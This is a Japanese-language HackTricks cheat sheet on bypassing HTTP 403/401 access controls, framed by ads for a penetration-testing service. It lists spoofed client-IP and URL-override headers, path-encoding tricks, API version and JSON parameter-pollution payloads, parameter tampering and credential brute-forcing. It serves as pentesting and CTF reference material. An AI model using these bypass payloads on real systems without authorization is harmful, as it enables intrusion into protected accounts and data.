403 & 401 Bypasses
Last updated
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE) GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
あなたのウェブアプリ、ネットワーク、クラウドに対するハッカーの視点を得る
実際のビジネスに影響を与える重大で悪用可能な脆弱性を見つけて報告します。 20以上のカスタムツールを使用して攻撃面をマッピングし、特権を昇格させるセキュリティ問題を見つけ、自動化されたエクスプロイトを使用して重要な証拠を収集し、あなたの努力を説得力のある報告に変えます。
HTTP動詞/メソッドファジング
ファイルにアクセスするために異なる動詞を使用してみてください:GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK
レスポンスヘッダーを確認してください。情報が提供されるかもしれません。例えば、HEADに対する200レスポンスが
Content-Length: 55の場合、HEAD動詞が情報にアクセスできることを意味します。しかし、その情報を抽出する方法を見つける必要があります。X-HTTP-Method-Override: PUTのようなHTTPヘッダーを使用すると、使用される動詞を上書きできます。TRACE動詞を使用し、運が良ければ、レスポンスに中間プロキシによって追加されたヘッダーが表示されるかもしれません。
HTTPヘッダーのファジング
Hostヘッダーを任意の値に変更する(ここで機能した)
他のユーザーエージェントを使用してリソースにアクセスしてみてください。
HTTPヘッダーをファジングする:HTTPプロキシヘッダー、HTTP認証ベーシックおよびNTLMブルートフォース(いくつかの組み合わせのみ)やその他の技術を試してください。これを行うために、fuzzhttpbypassというツールを作成しました。
X-Originating-IP: 127.0.0.1X-Forwarded-For: 127.0.0.1X-Forwarded: 127.0.0.1Forwarded-For: 127.0.0.1X-Remote-IP: 127.0.0.1X-Remote-Addr: 127.0.0.1X-ProxyUser-Ip: 127.0.0.1X-Original-URL: 127.0.0.1Client-IP: 127.0.0.1True-Client-IP: 127.0.0.1Cluster-Client-IP: 127.0.0.1X-ProxyUser-Ip: 127.0.0.1Host: localhost
パスが保護されている場合、これらの他のヘッダーを使用してパス保護をバイパスしてみてください:
X-Original-URL: /admin/consoleX-Rewrite-URL: /admin/consoleページがプロキシの背後にある場合、プライベート情報へのアクセスを妨げているのはプロキシかもしれません。HTTPリクエストスムージング または hop-by-hopヘッダーを悪用してみてください。
異なるレスポンスを探して特別なHTTPヘッダーをファジングしてください。
HTTPメソッドをファジングしながら特別なHTTPヘッダーをファジングしてください。
Hostヘッダーを削除すると、保護をバイパスできるかもしれません。
パスファジング
もし_/path_がブロックされている場合:
/%2e/pathを使用してみてください(アクセスがプロキシによってブロックされている場合、これで保護をバイパスできるかもしれません)。また、_** /%252e**/path(ダブルURLエンコード)を試してください。**
Unicodeバイパスを試してください:/%ef%bc%8fpath(URLエンコードされた文字は「/」のようなものです)ので、再エンコードすると_//path_になり、すでに_/path_の名前チェックをバイパスしているかもしれません。
他のパスバイパス:
site.com/secret –> HTTP 403 Forbidden
site.com/SECRET –> HTTP 200 OK
site.com/secret/ –> HTTP 200 OK
site.com/secret/. –> HTTP 200 OK
site.com//secret// –> HTTP 200 OK
site.com/./secret/.. –> HTTP 200 OK
site.com/;/secret –> HTTP 200 OK
site.com/.;/secret –> HTTP 200 OK
site.com//;//secret –> HTTP 200 OK
site.com/secret.json –> HTTP 200 OK (ruby)
次の状況でこのリストを使用してください:
/FUZZsecret
/FUZZ/secret
/secretFUZZ
他のAPIバイパス:
/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
{“id”:111} --> 401 Unauthorized
{“id”:[111]} --> 200 OK
{“id”:111} --> 401 Unauthorized
{“id”:{“id”:111}} --> 200 OK
{"user_id":"<legit_id>","user_id":"<victims_id>"} (JSONパラメータ汚染)
user_id=ATTACKER_ID&user_id=VICTIM_ID (パラメータ汚染)
パラメータ操作
param値を変更する:
id=123-->id=124URLに追加のパラメータを追加する:
?id=124—->id=124&isAdmin=trueパラメータを削除する
パラメータの順序を変更する
特殊文字を使用する。
パラメータで境界テストを実施する — _-234_や_0_や_99999999_のような値を提供する(いくつかの例値)。
プロトコルバージョン
HTTP/1.1を使用している場合は、1.0を使用してみてください、または2.0をサポートしているかテストしてみてください。
その他のバイパス
ドメインのIPまたはCNAMEを取得し、直接連絡してみてください。
サーバーにストレスをかけるために一般的なGETリクエストを送信してみてください(この人はFacebookで成功しました)。
プロトコルを変更する:httpからhttpsへ、またはhttpsからhttpへ
https://archive.org/web/にアクセスし、過去にそのファイルが全世界からアクセス可能だったかどうかを確認してください。
ブルートフォース
パスワードを推測する:以下の一般的な資格情報をテストしてください。被害者について何か知っていますか?それともCTFチャレンジ名ですか?
ブルートフォース:基本、ダイジェスト、NTLM認証を試してください。
一般的な資格情報
自動ツール
あなたのウェブアプリ、ネットワーク、クラウドに対するハッカーの視点を得る
実際のビジネスに影響を与える重大で悪用可能な脆弱性を見つけて報告します。 攻撃面をマッピングし、特権を昇格させるセキュリティ問題を見つけ、自動化されたエクスプロイトを使用して重要な証拠を収集するために、20以上のカスタムツールを使用して、あなたの努力を説得力のある報告書に変えます。
